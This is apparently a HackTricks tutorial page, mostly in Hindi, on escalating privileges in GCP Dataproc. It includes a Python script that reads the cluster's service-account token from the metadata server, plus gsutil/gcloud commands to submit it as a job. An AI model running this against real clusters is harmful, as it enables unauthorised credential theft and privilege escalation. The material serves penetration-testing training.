GCP Dataproc Privilege Escalation

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Dataproc

GCP - Dataproc Enum

dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get

मैं इस तरीके से reverse shell पाने में असफल रहा, हालांकि नीचे बताए गए तरीके से metadata endpoint से SA token को leak करना संभव है।

Steps to exploit

  • GCP Bucket पर job script रखें

  • Dataproc cluster पर एक job सबमिट करें।

  • metadata server तक पहुँचने के लिए job का उपयोग करें।

  • cluster द्वारा उपयोग किए गए service account token को leak करें।

Python स्क्रिप्ट जो metadata server से SA token प्राप्त करे ```python import requests

metadata_url = “http://metadata/computeMetadata/v1/instance/service-accounts/default/token” headers = {“Metadata-Flavor”: “Google”}

def fetch_metadata_token(): try: response = requests.get(metadata_url, headers=headers, timeout=5) response.raise_for_status() token = response.json().get(“access_token”, “”) print(f“Leaked Token: {token}“) return token except Exception as e: print(f“Error fetching metadata token: {e}”) return None

if name == “main”: fetch_metadata_token()

</details>

<details><summary>Dataproc क्लस्टर में दुर्भावनापूर्ण जॉब सबमिट करें</summary>
```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>

# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--cluster=<cluster-name> \
--region=<region>

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें